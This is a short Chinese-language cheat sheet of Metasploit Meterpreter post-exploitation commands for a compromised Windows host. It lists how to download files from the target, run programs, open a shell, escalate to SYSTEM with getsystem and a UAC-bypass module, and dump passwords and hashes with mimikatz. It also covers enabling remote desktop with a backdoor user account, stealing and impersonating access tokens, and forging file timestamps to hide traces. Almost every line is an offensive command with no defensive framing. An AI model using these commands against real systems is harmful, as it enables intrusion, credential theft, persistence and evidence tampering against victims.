1、download命令可以下载远程主机上的文件
命令:download文件名 文件路径to保存的位置
注意:windows路径要使用双斜线【linux向左边,windows向右边】
如果我们需要递归下载整个目录包括子目录和文件,我们可以使用download -r命令
2、在目标主机上执行exe文件
execute -f c://1.exe
3、创建cmd新通道
execute -f cmd -c
4、显示进程
命令:ps
5、获取目标主机的cmd—shell
shell命令可以进入目标主机的cmd
6、查看当前用户权限
getuid
7、获取admin权限
getsystem
命令可以提权到本地系统权限
8、木马模式调到后台执行
background
9、打开监听模块
use exploit/windows/local/bypassuac
10、调用msf中本地本地脚本提升权限
use exploit/windows/local/…
11、查看当前木马控制的会话
sessions -i
12、配置新会话
set sessions n
13、进入会话
sessions -i n
14、mimikatz 抓取密码
load mimikatz 加载
wdigest 获取密码
mimikatz_command -f samdump::hashes 执行mimikata原始命令
mimikatz_command -f sekurlsa::searchpasswords 执行mimikata原始命令
15、开启rdp&添加用户
run getgui -e 开启远程桌面
run getgui -u 1111 -p 22222 添加用户
16、令牌操纵
use incognito #heip incognito 查看帮助
list_tokens -u 查看可用的token
impersonate_token “伪造的身份” #假冒token 或者impersonate_token NT AUTHORITY\SYSTEM #不加单引号 需使用\
execute -f cmd.exe -i –t # -t 使用假冒的token 执行 或者直接shell
rev2self #返回原始token
17、steal_token 窃取令牌
steal_token <pid值> #从指定进程中窃取token 先ps
drop_token #删除窃取的token
18、timestomp伪造时间戳
timestomp C:// -h #查看帮助
timestomp -v C://2.txt #查看时间戳
timestomp C://2.txt -f C://1.txt #将1.txt的时间戳复制给2.txt
